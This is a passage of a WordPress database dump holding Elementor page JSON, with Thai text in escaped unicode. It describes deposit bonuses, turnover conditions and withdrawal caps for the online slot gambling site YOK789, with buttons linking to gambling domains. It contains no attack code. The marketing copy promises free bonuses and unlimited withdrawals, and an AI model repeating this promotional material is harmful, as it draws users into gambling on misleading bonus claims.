\\/>\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e08\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19<\\/p><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"197\\\" data-end=\\\"250\\\">20 \\/ 50 \\/ 100 \\/ 150 \\/ 200 \\/ 250 \\/ 300 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a<\\/strong><\\/li><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"255\\\" data-end=\\\"275\\\">\\ud83c\\udf81 Mystery Prize<\\/strong>\\u00a0\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 (\\u0e40\\u0e0a\\u0e48\\u0e19 500 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15 <strong data-start=\\\"310\\\" data-end=\\\"318\\\">\\u0e2b\\u0e23\\u0e37\\u0e2d<\\/strong> \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 +1)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5aae432\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d6f8124\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4ce4610\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"9e70ab2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e27\\u0e34\\u0e18\\u0e35\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e921159\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2531\\\" data-end=\\\"2570\\\">\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a \\u2192 \\u0e44\\u0e1b\\u0e17\\u0e35\\u0e48\\u0e40\\u0e21\\u0e19\\u0e39 <strong data-start=\\\"2555\\\" data-end=\\\"2568\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19<\\/strong><\\/li><li data-start=\\\"2574\\\" data-end=\\\"2643\\\">\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e14 <strong data-start=\\\"2599\\\" data-end=\\\"2614\\\">\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c<\\/strong> (\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e08\\u0e49\\u0e07\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e15\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38)<\\/li><li data-start=\\\"2647\\\" data-end=\\\"2706\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e02\\u0e49\\u0e32 <strong data-start=\\\"2662\\\" data-end=\\\"2675\\\">\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34<\\/strong> \\/ \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e33\\u0e40\\u0e23\\u0e47\\u0e08<\\/li><li data-start=\\\"2710\\\" data-end=\\\"2741\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e2a\\u0e16\\u0e32\\u0e19\\u0e30\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e27\\u0e31\\u0e15\\u0e34\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3257b34\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"076795c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"87a05f6\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9781422\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2092\\\" data-end=\\\"2176\\\">\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a <strong data-start=\\\"2109\\\" data-end=\\\"2138\\\">1 \\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49\\/1 \\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\/1 \\u0e44\\u0e2d\\u0e1e\\u0e35<\\/strong> \\u0e2b\\u0e49\\u0e32\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e17\\u0e38\\u0e01\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a<\\/li><li data-start=\\\"2179\\\" data-end=\\\"2301\\\">\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"2201\\\" data-end=\\\"2237\\\">\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e02\\u0e2d\\u0e07 <b>YOK789<\\/b><\\/strong>\\u00a0\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 (\\u0e2b\\u0e32\\u0e01\\u0e21\\u0e35\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e41\\u0e08\\u0e49\\u0e07\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21)<\\/li><li data-start=\\\"2304\\\" data-end=\\\"2404\\\">\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e43\\u0e14\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07 \\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e46 \\u0e41\\u0e25\\u0e30 <strong data-start=\\\"2365\\\" data-end=\\\"2385\\\">\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e1b\\u0e23<\\/strong> \\u0e22\\u0e01\\u0e40\\u0e27\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38\\u0e44\\u0e27\\u0e49<\\/li><li data-start=\\\"2407\\\" data-end=\\\"2499\\\"><strong data-start=\\\"2414\\\" data-end=\\\"2445\\\"><b>YOK789<\\/b> \\u0e02\\u0e2d\\u0e2a\\u0e07\\u0e27\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\/\\u0e22\\u0e01\\u0e40\\u0e25\\u0e34\\u0e01<\\/strong> \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e1b\\u0e0f\\u0e34\\u0e40\\u0e2a\\u0e18\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e2b\\u0e32\\u0e01\\u0e15\\u0e23\\u0e27\\u0e08\\u0e1e\\u0e1a\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\/\\u0e1c\\u0e34\\u0e14\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2597,343,'_thumbnail_id','282'),(2601,344,'_elementor_edit_mode','builder'),(2602,344,'_elementor_template_type','wp-page'),(2603,344,'_elementor_version','3.35.5'),(2604,344,'_elementor_pro_version','3.32.3'),(2605,344,'_wp_page_template','default'),(2606,344,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2607,344,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 YOK789 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-pm-slice=\\\"0 0 []\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e38\\u0e49\\u0e21\\u0e08\\u0e32\\u0e01 YOK789 \\u0e40\\u0e2d\\u0e32\\u0e43\\u0e08\\u0e2a\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e42\\u0e14\\u0e22\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30 \\u0e01\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e47\\u0e23\\u0e48\\u0e27\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e44\\u0e14\\u0e49 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e41\\u0e23\\u0e01 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e15\\u0e32\\u0e21\\u0e40\\u0e17\\u0e28\\u0e01\\u0e32\\u0e25 \\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e32\\u0e01\\u0e22\\u0e34\\u0e48\\u0e07\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07\\u0e43\\u0e19\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e44\\u0e23\\u0e01\\u0e47\\u0e15\\u0e32\\u0e21 \\u0e04\\u0e27\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e2a\\u0e15\\u0e34 \\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e2d\\u0e32\\u0e22\\u0e38 18 \\u0e1b\\u0e35\\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e25\\u0e30\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36a351d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"77587d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3b12e8f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/20-get-100-Banner-Yok789.webp\",\"id\":281,\"size\":\"\",\"alt\":\"20 get 100\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f1ccc77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 20 \\u0e23\\u0e31\\u0e1a 100\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"01efd62\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 20 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 80 = \\u0e23\\u0e27\\u0e21 100 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 200<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a08 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li>\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f359e1\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"e591d78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3e9ff8e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/79-get-200-Banner-Yok789.webp\",\"id\":282,\"size\":\"\",\"alt\":\"79 get 200\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d853dea\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 79 \\u0e23\\u0e31\\u0e1a 200\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ea7fc2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 79 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 121 = \\u0e23\\u0e27\\u0e21 200 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 600<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a07 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"883800f\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 